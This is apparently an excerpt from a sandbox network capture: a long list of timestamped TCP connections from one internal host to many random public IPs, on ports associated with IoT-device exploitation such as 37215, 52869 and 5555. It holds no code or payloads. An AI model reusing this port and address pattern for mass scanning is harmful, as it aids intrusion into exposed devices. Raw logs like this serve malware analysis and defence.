                                                              Dec 11, 2024 00:42:56.187355995 CET80803762292.121.62.166192.168.2.23
                                                              Dec 11, 2024 00:42:56.187364101 CET844339770182.89.16.0192.168.2.23
                                                              Dec 11, 2024 00:42:56.187366962 CET3729280192.168.2.23149.210.29.201
                                                              Dec 11, 2024 00:42:56.187367916 CET528693903261.2.36.48192.168.2.23
                                                              Dec 11, 2024 00:42:56.187376022 CET5286957932101.125.216.151192.168.2.23
                                                              Dec 11, 2024 00:42:56.187383890 CET8058674163.115.127.191192.168.2.23
                                                              Dec 11, 2024 00:42:56.187392950 CET815021420.133.24.145192.168.2.23
                                                              Dec 11, 2024 00:42:56.187403917 CET3903252869192.168.2.2361.2.36.48
                                                              Dec 11, 2024 00:42:56.187403917 CET376228080192.168.2.2392.121.62.166
                                                              Dec 11, 2024 00:42:56.187405109 CET397708443192.168.2.23182.89.16.0
                                                              Dec 11, 2024 00:42:56.187406063 CET5793252869192.168.2.23101.125.216.151
                                                              Dec 11, 2024 00:42:56.187408924 CET757454190131.214.104.215192.168.2.23
                                                              Dec 11, 2024 00:42:56.187417984 CET5867480192.168.2.23163.115.127.191
                                                              Dec 11, 2024 00:42:56.187417984 CET8040804102.112.159.159192.168.2.23
                                                              Dec 11, 2024 00:42:56.187427044 CET5021481192.168.2.2320.133.24.145
                                                              Dec 11, 2024 00:42:56.187453985 CET4080480192.168.2.23102.112.159.159
                                                              Dec 11, 2024 00:42:56.187458038 CET541907574192.168.2.23131.214.104.215
                                                              Dec 11, 2024 00:42:56.188335896 CET805565654.252.138.172192.168.2.23
                                                              Dec 11, 2024 00:42:56.188344002 CET8059574103.183.65.217192.168.2.23
                                                              Dec 11, 2024 00:42:56.188369036 CET5565680192.168.2.2354.252.138.172
                                                              Dec 11, 2024 00:42:56.188375950 CET5957480192.168.2.23103.183.65.217
                                                              Dec 11, 2024 00:42:56.188426018 CET84433593269.74.133.144192.168.2.23
                                                              Dec 11, 2024 00:42:56.188435078 CET372154021692.35.9.7192.168.2.23
                                                              Dec 11, 2024 00:42:56.188477993 CET359328443192.168.2.2369.74.133.144
                                                              Dec 11, 2024 00:42:56.188477993 CET4021637215192.168.2.2392.35.9.7
                                                              Dec 11, 2024 00:42:56.188488007 CET5286951804193.245.80.68192.168.2.23
                                                              Dec 11, 2024 00:42:56.188497066 CET80805739666.186.235.199192.168.2.23
                                                              Dec 11, 2024 00:42:56.188504934 CET805147031.124.239.80192.168.2.23
                                                              Dec 11, 2024 00:42:56.188514948 CET808057064158.123.170.118192.168.2.23
                                                              Dec 11, 2024 00:42:56.188524008 CET5180452869192.168.2.23193.245.80.68
                                                              Dec 11, 2024 00:42:56.188530922 CET573968080192.168.2.2366.186.235.199
                                                              Dec 11, 2024 00:42:56.188530922 CET5147080192.168.2.2331.124.239.80
                                                              Dec 11, 2024 00:42:56.188539982 CET808041712180.236.218.223192.168.2.23
                                                              Dec 11, 2024 00:42:56.188554049 CET570648080192.168.2.23158.123.170.118
                                                              Dec 11, 2024 00:42:56.188581944 CET555551422177.60.56.110192.168.2.23
                                                              Dec 11, 2024 00:42:56.188590050 CET80803652291.41.16.118192.168.2.23
                                                              Dec 11, 2024 00:42:56.188606977 CET417128080192.168.2.23180.236.218.223
                                                              Dec 11, 2024 00:42:56.188611984 CET514225555192.168.2.23177.60.56.110
                                                              Dec 11, 2024 00:42:56.188621044 CET528695106673.124.161.55192.168.2.23
                                                              Dec 11, 2024 00:42:56.188625097 CET365228080192.168.2.2391.41.16.118
                                                              Dec 11, 2024 00:42:56.188631058 CET5286954874217.238.86.73192.168.2.23
                                                              Dec 11, 2024 00:42:56.188640118 CET5286944164131.95.252.218192.168.2.23
                                                              Dec 11, 2024 00:42:56.188659906 CET5106652869192.168.2.2373.124.161.55
                                                              Dec 11, 2024 00:42:56.188663006 CET5487452869192.168.2.23217.238.86.73
                                                              Dec 11, 2024 00:42:56.188672066 CET4416452869192.168.2.23131.95.252.218
                                                              Dec 11, 2024 00:42:56.188698053 CET757438868141.202.115.162192.168.2.23
                                                              Dec 11, 2024 00:42:56.188705921 CET804790213.239.19.86192.168.2.23
                                                              Dec 11, 2024 00:42:56.188714027 CET8033940168.174.53.247192.168.2.23
                                                              Dec 11, 2024 00:42:56.188723087 CET8039344205.19.156.154192.168.2.23
                                                              Dec 11, 2024 00:42:56.188739061 CET4790280192.168.2.2313.239.19.86
                                                              Dec 11, 2024 00:42:56.188739061 CET4915240430214.6.88.200192.168.2.23
                                                              Dec 11, 2024 00:42:56.188747883 CET757446876190.202.109.241192.168.2.23
                                                              Dec 11, 2024 00:42:56.188749075 CET3394080192.168.2.23168.174.53.247
                                                              Dec 11, 2024 00:42:56.188750982 CET388687574192.168.2.23141.202.115.162
                                                              Dec 11, 2024 00:42:56.188759089 CET8041916126.179.23.111192.168.2.23
                                                              Dec 11, 2024 00:42:56.188766003 CET3934480192.168.2.23205.19.156.154
                                                              Dec 11, 2024 00:42:56.188780069 CET4043049152192.168.2.23214.6.88.200
                                                              Dec 11, 2024 00:42:56.188781023 CET804522217.224.44.220192.168.2.23
                                                              Dec 11, 2024 00:42:56.188786030 CET468767574192.168.2.23190.202.109.241
                                                              Dec 11, 2024 00:42:56.188792944 CET4191680192.168.2.23126.179.23.111
                                                              Dec 11, 2024 00:42:56.188812017 CET4522280192.168.2.2317.224.44.220
                                                              Dec 11, 2024 00:42:56.189373016 CET805906667.156.164.38192.168.2.23
                                                              Dec 11, 2024 00:42:56.189414978 CET5906680192.168.2.2367.156.164.38
                                                              Dec 11, 2024 00:42:56.189441919 CET80804188660.131.7.118192.168.2.23
                                                              Dec 11, 2024 00:42:56.189461946 CET8056796121.202.179.6192.168.2.23
                                                              Dec 11, 2024 00:42:56.189480066 CET418868080192.168.2.2360.131.7.118
                                                              Dec 11, 2024 00:42:56.189491987 CET5679680192.168.2.23121.202.179.6
                                                              Dec 11, 2024 00:42:56.189505100 CET8443563783.26.211.195192.168.2.23
                                                              Dec 11, 2024 00:42:56.189513922 CET4915239970217.176.190.109192.168.2.23
                                                              Dec 11, 2024 00:42:56.189527988 CET80803795690.24.179.163192.168.2.23
                                                              Dec 11, 2024 00:42:56.189548969 CET563788443192.168.2.233.26.211.195
                                                              Dec 11, 2024 00:42:56.189548969 CET3997049152192.168.2.23217.176.190.109
                                                              Dec 11, 2024 00:42:56.189554930 CET379568080192.168.2.2390.24.179.163
                                                              Dec 11, 2024 00:42:56.189641953 CET372154233872.93.110.172192.168.2.23
                                                              Dec 11, 2024 00:42:56.189652920 CET55553352681.109.6.200192.168.2.23
                                                              Dec 11, 2024 00:42:56.189661026 CET8045096187.32.93.189192.168.2.23
                                                              Dec 11, 2024 00:42:56.189687967 CET4233837215192.168.2.2372.93.110.172
                                                              Dec 11, 2024 00:42:56.189688921 CET335265555192.168.2.2381.109.6.200
                                                              Dec 11, 2024 00:42:56.189698935 CET844348844192.37.151.90192.168.2.23
                                                              Dec 11, 2024 00:42:56.189701080 CET4509680192.168.2.23187.32.93.189
                                                              Dec 11, 2024 00:42:56.189713001 CET803567276.17.188.37192.168.2.23
                                                              Dec 11, 2024 00:42:56.189739943 CET488448443192.168.2.23192.37.151.90
                                                              Dec 11, 2024 00:42:56.189747095 CET80331626.218.88.254192.168.2.23
                                                              Dec 11, 2024 00:42:56.189754963 CET3567280192.168.2.2376.17.188.37
                                                              Dec 11, 2024 00:42:56.189755917 CET80804153815.157.152.64192.168.2.23
                                                              Dec 11, 2024 00:42:56.189763069 CET3721542464207.207.172.96192.168.2.23
                                                              Dec 11, 2024 00:42:56.189791918 CET4246437215192.168.2.23207.207.172.96
                                                              Dec 11, 2024 00:42:56.189795971 CET415388080192.168.2.2315.157.152.64
                                                              Dec 11, 2024 00:42:56.189796925 CET3316280192.168.2.236.218.88.254
                                                              Dec 11, 2024 00:42:56.189820051 CET8042494221.40.54.221192.168.2.23
                                                              Dec 11, 2024 00:42:56.189866066 CET4249480192.168.2.23221.40.54.221
                                                              Dec 11, 2024 00:42:56.190100908 CET3721536258170.243.90.64192.168.2.23
                                                              Dec 11, 2024 00:42:56.190109015 CET844356236131.43.106.19192.168.2.23
                                                              Dec 11, 2024 00:42:56.190113068 CET491524627076.227.143.215192.168.2.23
                                                              Dec 11, 2024 00:42:56.190115929 CET808045140124.39.196.18192.168.2.23
                                                              Dec 11, 2024 00:42:56.190140963 CET3625837215192.168.2.23170.243.90.64
                                                              Dec 11, 2024 00:42:56.190145969 CET562368443192.168.2.23131.43.106.19
                                                              Dec 11, 2024 00:42:56.190145969 CET4627049152192.168.2.2376.227.143.215
                                                              Dec 11, 2024 00:42:56.190154076 CET451408080192.168.2.23124.39.196.18
                                                              Dec 11, 2024 00:42:56.190170050 CET55555168254.78.250.89192.168.2.23
                                                              Dec 11, 2024 00:42:56.190180063 CET4915259228123.175.241.125192.168.2.23
                                                              Dec 11, 2024 00:42:56.190208912 CET5922849152192.168.2.23123.175.241.125
                                                              Dec 11, 2024 00:42:56.190211058 CET516825555192.168.2.2354.78.250.89
                                                              Dec 11, 2024 00:42:56.224473000 CET597628080192.168.2.23170.13.70.64
                                                              Dec 11, 2024 00:42:56.224524021 CET4458881192.168.2.23118.114.118.190
                                                              Dec 11, 2024 00:42:56.224549055 CET482748080192.168.2.2365.224.38.249
                                                              Dec 11, 2024 00:42:56.224577904 CET466407574192.168.2.2334.136.79.41
                                                              Dec 11, 2024 00:42:56.224601030 CET4852280192.168.2.23178.51.3.128
                                                              Dec 11, 2024 00:42:56.224778891 CET3854080192.168.2.23202.152.121.18
                                                              Dec 11, 2024 00:42:56.224807024 CET4191280192.168.2.23152.158.234.19
                                                              Dec 11, 2024 00:42:56.224832058 CET4365837215192.168.2.23101.108.225.47
                                                              Dec 11, 2024 00:42:56.224873066 CET6029480192.168.2.23182.216.146.147
                                                              Dec 11, 2024 00:42:56.224904060 CET548368080192.168.2.23142.235.63.140
                                                              Dec 11, 2024 00:42:56.225878000 CET3567280192.168.2.2376.17.188.37
                                                              Dec 11, 2024 00:42:56.225912094 CET3316280192.168.2.236.218.88.254
                                                              Dec 11, 2024 00:42:56.225929976 CET415388080192.168.2.2315.157.152.64
                                                              Dec 11, 2024 00:42:56.225963116 CET4246437215192.168.2.23207.207.172.96
                                                              Dec 11, 2024 00:42:56.225981951 CET4249480192.168.2.23221.40.54.221
                                                              Dec 11, 2024 00:42:56.226016045 CET3625837215192.168.2.23170.243.90.64
                                                              Dec 11, 2024 00:42:56.226030111 CET562368443192.168.2.23131.43.106.19
                                                              Dec 11, 2024 00:42:56.226057053 CET4627049152192.168.2.2376.227.143.215
                                                              Dec 11, 2024 00:42:56.226089001 CET451408080192.168.2.23124.39.196.18
                                                              Dec 11, 2024 00:42:56.226099014 CET516825555192.168.2.2354.78.250.89
                                                              Dec 11, 2024 00:42:56.226139069 CET5922849152192.168.2.23123.175.241.125
                                                              Dec 11, 2024 00:42:56.263309002 CET484588080192.168.2.23100.184.144.114
                                                              Dec 11, 2024 00:42:56.263329983 CET4171480192.168.2.23113.229.7.213
                                                              Dec 11, 2024 00:42:56.263355970 CET4290652869192.168.2.2384.2.80.57
                                                              Dec 11, 2024 00:42:56.263376951 CET4044080192.168.2.2321.244.144.86
                                                              Dec 11, 2024 00:42:56.263384104 CET504008080192.168.2.23216.18.254.161
                                                              Dec 11, 2024 00:42:56.263412952 CET548567574192.168.2.23167.151.164.41
                                                              Dec 11, 2024 00:42:56.263428926 CET418128080192.168.2.2387.116.84.152
                                                              Dec 11, 2024 00:42:56.263468981 CET4737252869192.168.2.23162.33.207.205
                                                              Dec 11, 2024 00:42:56.263501883 CET3714280192.168.2.2360.29.245.149
                                                              Dec 11, 2024 00:42:56.263523102 CET5690252869192.168.2.23194.213.146.39
                                                              Dec 11, 2024 00:42:56.263545036 CET607488080192.168.2.2328.144.199.55
                                                              Dec 11, 2024 00:42:56.263577938 CET5531880192.168.2.23222.76.197.121
                                                              Dec 11, 2024 00:42:56.263596058 CET515488080192.168.2.23182.98.49.24
                                                              Dec 11, 2024 00:42:56.263618946 CET513988080192.168.2.23210.181.40.142
                                                              Dec 11, 2024 00:42:56.263643026 CET4553680192.168.2.2342.242.241.33
                                                              Dec 11, 2024 00:42:56.263663054 CET392328080192.168.2.23106.44.250.26
                                                              Dec 11, 2024 00:42:56.263699055 CET5810437215192.168.2.23121.136.2.49
                                                              Dec 11, 2024 00:42:56.263714075 CET362248080192.168.2.23124.74.74.114
                                                              Dec 11, 2024 00:42:56.263726950 CET382188443192.168.2.2338.122.193.152
                                                              Dec 11, 2024 00:42:56.263750076 CET4778680192.168.2.23210.135.157.10
                                                              Dec 11, 2024 00:42:56.263783932 CET5004280192.168.2.23137.151.78.143
                                                              Dec 11, 2024 00:42:56.263798952 CET5423680192.168.2.23136.34.183.2
                                                              Dec 11, 2024 00:42:56.263811111 CET5671281192.168.2.2385.78.252.113
                                                              Dec 11, 2024 00:42:56.263847113 CET4153637215192.168.2.2326.83.38.216
                                                              Dec 11, 2024 00:42:56.263864040 CET577768443192.168.2.2335.36.155.170
                                                              Dec 11, 2024 00:42:56.263890028 CET4712880192.168.2.23167.210.102.18
                                                              Dec 11, 2024 00:42:56.263906956 CET531888080192.168.2.23118.35.168.154
                                                              Dec 11, 2024 00:42:56.263931990 CET5325880192.168.2.23163.152.100.25
                                                              Dec 11, 2024 00:42:56.263956070 CET390327574192.168.2.23134.32.128.235
                                                              Dec 11, 2024 00:42:56.263979912 CET5021449152192.168.2.23125.133.16.27
                                                              Dec 11, 2024 00:42:56.263998985 CET3901680192.168.2.23123.244.144.208
                                                              Dec 11, 2024 00:42:56.264020920 CET5376680192.168.2.23161.185.149.32
                                                              Dec 11, 2024 00:42:56.264045954 CET4408837215192.168.2.23158.219.39.254
                                                              Dec 11, 2024 00:42:56.264059067 CET525288080192.168.2.235.244.147.234
                                                              Dec 11, 2024 00:42:56.264081955 CET4215480192.168.2.2371.44.225.112
                                                              Dec 11, 2024 00:42:56.264106989 CET5897252869192.168.2.2379.39.229.25
                                                              Dec 11, 2024 00:42:56.264132023 CET5928452869192.168.2.2331.20.181.48
                                                              Dec 11, 2024 00:42:56.264147043 CET350388080192.168.2.2361.237.100.81
                                                              Dec 11, 2024 00:42:56.264172077 CET338705555192.168.2.2348.214.85.13
                                                              Dec 11, 2024 00:42:56.264189959 CET4524052869192.168.2.23161.199.124.145
                                                              Dec 11, 2024 00:42:56.264213085 CET414368080192.168.2.23190.249.69.106
                                                              Dec 11, 2024 00:42:56.264229059 CET5488080192.168.2.2323.173.106.27
                                                              Dec 11, 2024 00:42:56.264246941 CET4909480192.168.2.23192.135.140.135
                                                              Dec 11, 2024 00:42:56.264265060 CET547748080192.168.2.23204.81.207.188
                                                              Dec 11, 2024 00:42:56.264278889 CET6016880192.168.2.23220.15.89.10
                                                              Dec 11, 2024 00:42:56.264314890 CET4251437215192.168.2.23142.31.67.244
                                                              Dec 11, 2024 00:42:56.264338017 CET380107574192.168.2.23221.42.76.51
                                                              Dec 11, 2024 00:42:56.264374018 CET4401249152192.168.2.2379.10.209.34
                                                              Dec 11, 2024 00:42:56.264394045 CET5526480192.168.2.239.58.179.109
                                                              Dec 11, 2024 00:42:56.264414072 CET5820280192.168.2.2329.105.29.159
                                                              Dec 11, 2024 00:42:56.264435053 CET464327574192.168.2.23203.29.198.208
                                                              Dec 11, 2024 00:42:56.264467955 CET4574480192.168.2.2373.34.189.202
                                                              Dec 11, 2024 00:42:56.264483929 CET4300281192.168.2.23120.144.248.245
                                                              Dec 11, 2024 00:42:56.264504910 CET513788080192.168.2.23113.145.142.202
                                                              Dec 11, 2024 00:42:56.264519930 CET5321281192.168.2.23150.246.65.115
                                                              Dec 11, 2024 00:42:56.264549017 CET4383680192.168.2.23125.163.236.226
                                                              Dec 11, 2024 00:42:56.264585018 CET6074237215192.168.2.23149.241.161.180
                                                              Dec 11, 2024 00:42:56.264596939 CET604228080192.168.2.23184.96.7.28
                                                              Dec 11, 2024 00:42:56.264619112 CET406308080192.168.2.239.109.75.127
                                                              Dec 11, 2024 00:42:56.264637947 CET478947574192.168.2.23206.142.193.152
                                                              Dec 11, 2024 00:42:56.264661074 CET564248080192.168.2.2347.30.123.212
                                                              Dec 11, 2024 00:42:56.264684916 CET589405555192.168.2.2387.120.225.117
                                                              Dec 11, 2024 00:42:56.264702082 CET330588443192.168.2.23140.81.126.115
                                                              Dec 11, 2024 00:42:56.264722109 CET449645555192.168.2.23153.95.193.121
                                                              Dec 11, 2024 00:42:56.264743090 CET3863280192.168.2.2356.53.8.6
                                                              Dec 11, 2024 00:42:56.264760971 CET3317281192.168.2.2391.53.41.217
                                                              Dec 11, 2024 00:42:56.264784098 CET3402480192.168.2.23193.94.36.43
                                                              Dec 11, 2024 00:42:56.264806032 CET387608443192.168.2.2318.65.35.200
                                                              Dec 11, 2024 00:42:56.264822006 CET5589281192.168.2.2331.225.239.95
                                                              Dec 11, 2024 00:42:56.264861107 CET4821849152192.168.2.2393.31.4.225
                                                              Dec 11, 2024 00:42:56.264874935 CET432268080192.168.2.23206.130.7.22
                                                              Dec 11, 2024 00:42:56.264895916 CET3935280192.168.2.23222.38.112.228
                                                              Dec 11, 2024 00:42:56.264914036 CET440308443192.168.2.23137.27.133.90
                                                              Dec 11, 2024 00:42:56.264942884 CET4540080192.168.2.23203.2.27.219
                                                              Dec 11, 2024 00:42:56.264961004 CET5480680192.168.2.23143.186.21.173
                                                              Dec 11, 2024 00:42:56.264986992 CET3855037215192.168.2.2313.9.189.7
                                                              Dec 11, 2024 00:42:56.265021086 CET5033280192.168.2.2383.96.191.136
                                                              Dec 11, 2024 00:42:56.265043974 CET485165555192.168.2.23186.251.44.209
                                                              Dec 11, 2024 00:42:56.265074015 CET4235649152192.168.2.23166.192.145.39
                                                              Dec 11, 2024 00:42:56.265090942 CET385688080192.168.2.23211.70.46.51
                                                              Dec 11, 2024 00:42:56.265106916 CET539208443192.168.2.23196.115.212.171
                                                              Dec 11, 2024 00:42:56.265129089 CET555028080192.168.2.23187.147.83.5
                                                              Dec 11, 2024 00:42:56.265142918 CET4299480192.168.2.2314.232.148.193
                                                              Dec 11, 2024 00:42:56.265162945 CET533848080192.168.2.23162.198.43.227
                                                              Dec 11, 2024 00:42:56.265188932 CET5573880192.168.2.23154.140.14.6
                                                              Dec 11, 2024 00:42:56.265212059 CET5419280192.168.2.23186.173.246.164
                                                              Dec 11, 2024 00:42:56.265233994 CET6013881192.168.2.23118.30.132.235
                                                              Dec 11, 2024 00:42:56.265253067 CET5933680192.168.2.2334.57.137.153
                                                              Dec 11, 2024 00:42:56.265271902 CET560748443192.168.2.23139.77.12.175
                                                              Dec 11, 2024 00:42:56.265295982 CET525205555192.168.2.23140.9.134.133
                                                              Dec 11, 2024 00:42:56.265317917 CET4867680192.168.2.2340.223.116.254
                                                              Dec 11, 2024 00:42:56.265340090 CET3406680192.168.2.2316.29.234.244
                                                              Dec 11, 2024 00:42:56.265374899 CET5408049152192.168.2.23110.142.198.158
                                                              Dec 11, 2024 00:42:56.265389919 CET348968443192.168.2.2363.44.16.237
                                                              Dec 11, 2024 00:42:56.265409946 CET5364881192.168.2.23162.83.75.110
                                                              Dec 11, 2024 00:42:56.265430927 CET5845080192.168.2.23148.225.57.169
                                                              Dec 11, 2024 00:42:56.265464067 CET5848437215192.168.2.23141.80.218.97
                                                              Dec 11, 2024 00:42:56.265494108 CET4188837215192.168.2.2362.217.115.182
                                                              Dec 11, 2024 00:42:56.265522957 CET4540449152192.168.2.2350.91.199.9
                                                              Dec 11, 2024 00:42:56.265544891 CET412808080192.168.2.23215.50.246.23
                                                              Dec 11, 2024 00:42:56.265578032 CET5540237215192.168.2.2389.213.177.170
                                                              Dec 11, 2024 00:42:56.265593052 CET4176680192.168.2.23179.117.226.194
                                                              Dec 11, 2024 00:42:56.265616894 CET429745555192.168.2.2390.197.2.27
                                                              Dec 11, 2024 00:42:56.265641928 CET5624680192.168.2.23152.117.85.253
                                                              Dec 11, 2024 00:42:56.265659094 CET509648080192.168.2.2323.113.105.209
                                                              Dec 11, 2024 00:42:56.265687943 CET4625249152192.168.2.239.70.45.227
                                                              Dec 11, 2024 00:42:56.265723944 CET4326249152192.168.2.23113.146.56.79
                                                              Dec 11, 2024 00:42:56.265753984 CET4285649152192.168.2.23108.85.179.160
                                                              Dec 11, 2024 00:42:56.265774965 CET339388080192.168.2.23202.202.168.64
                                                              Dec 11, 2024 00:42:56.265789032 CET600248443192.168.2.23195.246.106.194
                                                              Dec 11, 2024 00:42:56.265821934 CET3731449152192.168.2.2347.69.248.12
                                                              Dec 11, 2024 00:42:56.265839100 CET5413281192.168.2.2342.208.199.211
                                                              Dec 11, 2024 00:42:56.265856028 CET5690081192.168.2.23118.137.245.66
                                                              Dec 11, 2024 00:42:56.265882969 CET583247574192.168.2.23201.200.12.116
                                                              Dec 11, 2024 00:42:56.265918016 CET4403437215192.168.2.23164.98.152.87
                                                              Dec 11, 2024 00:42:56.265944958 CET5772849152192.168.2.2365.131.166.130
                                                              Dec 11, 2024 00:42:56.265979052 CET5012649152192.168.2.2332.170.33.253
                                                              Dec 11, 2024 00:42:56.265994072 CET437748443192.168.2.23124.13.202.21
                                                              Dec 11, 2024 00:42:56.266019106 CET522587574192.168.2.2345.27.188.99
                                                              Dec 11, 2024 00:42:56.266033888 CET440568080192.168.2.23191.251.39.30
                                                              Dec 11, 2024 00:42:56.266056061 CET523428080192.168.2.2377.93.207.38
                                                              Dec 11, 2024 00:42:56.266071081 CET521665555192.168.2.23157.149.9.22
                                                              Dec 11, 2024 00:42:56.266105890 CET461345555192.168.2.2376.51.22.34
                                                              Dec 11, 2024 00:42:56.266114950 CET3400281192.168.2.23103.159.1.83
                                                              Dec 11, 2024 00:42:56.266125917 CET572088080192.168.2.23119.7.140.192
                                                              Dec 11, 2024 00:42:56.266159058 CET332905555192.168.2.23214.156.186.64
                                                              Dec 11, 2024 00:42:56.266184092 CET3739280192.168.2.23207.198.77.45
                                                              Dec 11, 2024 00:42:56.266194105 CET577668080192.168.2.2326.194.72.229
                                                              Dec 11, 2024 00:42:56.266222954 CET476565555192.168.2.2330.227.89.81
                                                              Dec 11, 2024 00:42:56.266237020 CET409968080192.168.2.23207.144.197.158
                                                              Dec 11, 2024 00:42:56.266254902 CET450007574192.168.2.233.254.159.181
                                                              Dec 11, 2024 00:42:56.266289949 CET4790237215192.168.2.23215.149.25.71
                                                              Dec 11, 2024 00:42:56.266313076 CET4138481192.168.2.2385.146.86.114
                                                              Dec 11, 2024 00:42:56.266325951 CET372248080192.168.2.23106.176.156.149
                                                              Dec 11, 2024 00:42:56.266343117 CET5938080192.168.2.23212.148.153.192
                                                              Dec 11, 2024 00:42:56.266366005 CET505007574192.168.2.23215.47.78.226
                                                              Dec 11, 2024 00:42:56.266391993 CET4761080192.168.2.2338.95.163.205
                                                              Dec 11, 2024 00:42:56.266421080 CET5308837215192.168.2.23169.80.247.56
                                                              Dec 11, 2024 00:42:56.266443968 CET3612281192.168.2.23214.127.32.13
                                                              Dec 11, 2024 00:42:56.266474962 CET5657849152192.168.2.2365.143.55.175
                                                              Dec 11, 2024 00:42:56.266504049 CET3419249152192.168.2.23121.19.25.76
                                                              Dec 11, 2024 00:42:56.266525984 CET518128443192.168.2.2380.42.221.252
                                                              Dec 11, 2024 00:42:56.266556025 CET4825852869192.168.2.2351.217.212.91
                                                              Dec 11, 2024 00:42:56.266566038 CET5476880192.168.2.23171.2.151.108
                                                              Dec 11, 2024 00:42:56.266585112 CET464348080192.168.2.23183.37.186.197
                                                              Dec 11, 2024 00:42:56.266602993 CET3729280192.168.2.23149.210.29.201
                                                              Dec 11, 2024 00:42:56.266618013 CET376228080192.168.2.2392.121.62.166
                                                              Dec 11, 2024 00:42:56.266642094 CET397708443192.168.2.23182.89.16.0
                                                              Dec 11, 2024 00:42:56.266663074 CET3903252869192.168.2.2361.2.36.48
                                                              Dec 11, 2024 00:42:56.266686916 CET5793252869192.168.2.23101.125.216.151
                                                              Dec 11, 2024 00:42:56.266702890 CET5867480192.168.2.23163.115.127.191
                                                              Dec 11, 2024 00:42:56.266726017 CET5021481192.168.2.2320.133.24.145
                                                              Dec 11, 2024 00:42:56.266747952 CET541907574192.168.2.23131.214.104.215
                                                              Dec 11, 2024 00:42:56.266767979 CET4080480192.168.2.23102.112.159.159
                                                              Dec 11, 2024 00:42:56.266793966 CET5565680192.168.2.2354.252.138.172
                                                              Dec 11, 2024 00:42:56.266813993 CET5957480192.168.2.23103.183.65.217
                                                              Dec 11, 2024 00:42:56.266832113 CET359328443192.168.2.2369.74.133.144
                                                              Dec 11, 2024 00:42:56.266863108 CET4021637215192.168.2.2392.35.9.7
                                                              Dec 11, 2024 00:42:56.266889095 CET5180452869192.168.2.23193.245.80.68
                                                              Dec 11, 2024 00:42:56.267268896 CET573968080192.168.2.2366.186.235.199
                                                              Dec 11, 2024 00:42:56.267294884 CET5147080192.168.2.2331.124.239.80
                                                              Dec 11, 2024 00:42:56.267314911 CET570648080192.168.2.23158.123.170.118
                                                              Dec 11, 2024 00:42:56.267333031 CET417128080192.168.2.23180.236.218.223
                                                              Dec 11, 2024 00:42:56.267350912 CET514225555192.168.2.23177.60.56.110
                                                              Dec 11, 2024 00:42:56.267366886 CET365228080192.168.2.2391.41.16.118
                                                              Dec 11, 2024 00:42:56.267393112 CET5106652869192.168.2.2373.124.161.55
                                                              Dec 11, 2024 00:42:56.267417908 CET5487452869192.168.2.23217.238.86.73
                                                              Dec 11, 2024 00:42:56.267441034 CET4416452869192.168.2.23131.95.252.218
                                                              Dec 11, 2024 00:42:56.267473936 CET388687574192.168.2.23141.202.115.162
                                                              Dec 11, 2024 00:42:56.267501116 CET4790280192.168.2.2313.239.19.86
                                                              Dec 11, 2024 00:42:56.267524958 CET3394080192.168.2.23168.174.53.247
                                                              Dec 11, 2024 00:42:56.267538071 CET3934480192.168.2.23205.19.156.154
                                                              Dec 11, 2024 00:42:56.267570972 CET4043049152192.168.2.23214.6.88.200
                                                              Dec 11, 2024 00:42:56.267595053 CET468767574192.168.2.23190.202.109.241
                                                              Dec 11, 2024 00:42:56.267610073 CET4191680192.168.2.23126.179.23.111
                                                              Dec 11, 2024 00:42:56.267637968 CET4522280192.168.2.2317.224.44.220
                                                              Dec 11, 2024 00:42:56.267652035 CET5906680192.168.2.2367.156.164.38
                                                              Dec 11, 2024 00:42:56.267677069 CET418868080192.168.2.2360.131.7.118
                                                              Dec 11, 2024 00:42:56.267698050 CET5679680192.168.2.23121.202.179.6
                                                              Dec 11, 2024 00:42:56.267718077 CET563788443192.168.2.233.26.211.195
                                                              Dec 11, 2024 00:42:56.267746925 CET3997049152192.168.2.23217.176.190.109
                                                              Dec 11, 2024 00:42:56.267761946 CET379568080192.168.2.2390.24.179.163
                                                              Dec 11, 2024 00:42:56.267793894 CET4233837215192.168.2.2372.93.110.172
                                                              Dec 11, 2024 00:42:56.267824888 CET335265555192.168.2.2381.109.6.200
                                                              Dec 11, 2024 00:42:56.267854929 CET4509680192.168.2.23187.32.93.189
                                                              Dec 11, 2024 00:42:56.267872095 CET488448443192.168.2.23192.37.151.90
                                                              Dec 11, 2024 00:42:56.300209999 CET808049554179.171.182.119192.168.2.23
                                                              Dec 11, 2024 00:42:56.300268888 CET495548080192.168.2.23179.171.182.119
                                                              Dec 11, 2024 00:42:56.300283909 CET3721533418167.126.69.248192.168.2.23
                                                              Dec 11, 2024 00:42:56.300293922 CET5286935372170.59.144.179192.168.2.23
                                                              Dec 11, 2024 00:42:56.300302029 CET84435058224.112.229.127192.168.2.23
                                                              Dec 11, 2024 00:42:56.300311089 CET803575489.108.193.238192.168.2.23
                                                              Dec 11, 2024 00:42:56.300323963 CET757444166166.117.94.49192.168.2.23
                                                              Dec 11, 2024 00:42:56.300340891 CET80804246682.213.155.86192.168.2.23
                                                              Dec 11, 2024 00:42:56.300348997 CET8080329069.61.172.208192.168.2.23
                                                              Dec 11, 2024 00:42:56.300354004 CET80804212092.244.233.206192.168.2.23
                                                              Dec 11, 2024 00:42:56.300417900 CET757438328187.114.160.162192.168.2.23
                                                              Dec 11, 2024 00:42:56.300426960 CET803281411.219.254.179192.168.2.23
                                                              Dec 11, 2024 00:42:56.300431967 CET424668080192.168.2.2382.213.155.86
                                                              Dec 11, 2024 00:42:56.300434113 CET505828443192.168.2.2324.112.229.127
                                                              Dec 11, 2024 00:42:56.300436020 CET5286942974179.30.194.108192.168.2.23
                                                              Dec 11, 2024 00:42:56.300436020 CET3537252869192.168.2.23170.59.144.179
                                                              Dec 11, 2024 00:42:56.300441027 CET813737271.180.206.139192.168.2.23
                                                              Dec 11, 2024 00:42:56.300445080 CET329068080192.168.2.239.61.172.208
                                                              Dec 11, 2024 00:42:56.300445080 CET421208080192.168.2.2392.244.233.206
                                                              Dec 11, 2024 00:42:56.300450087 CET441667574192.168.2.23166.117.94.49
                                                              Dec 11, 2024 00:42:56.300450087 CET80803900622.236.52.239192.168.2.23
                                                              Dec 11, 2024 00:42:56.300453901 CET3341837215192.168.2.23167.126.69.248
                                                              Dec 11, 2024 00:42:56.300453901 CET3575480192.168.2.2389.108.193.238
                                                              Dec 11, 2024 00:42:56.300460100 CET808033314153.28.27.68192.168.2.23
                                                              Dec 11, 2024 00:42:56.300462961 CET3737281192.168.2.2371.180.206.139
                                                              Dec 11, 2024 00:42:56.300462961 CET383287574192.168.2.23187.114.160.162
                                                              Dec 11, 2024 00:42:56.300465107 CET3281480192.168.2.2311.219.254.179
                                                              Dec 11, 2024 00:42:56.300467968 CET4297452869192.168.2.23179.30.194.108
                                                              Dec 11, 2024 00:42:56.300482035 CET390068080192.168.2.2322.236.52.239
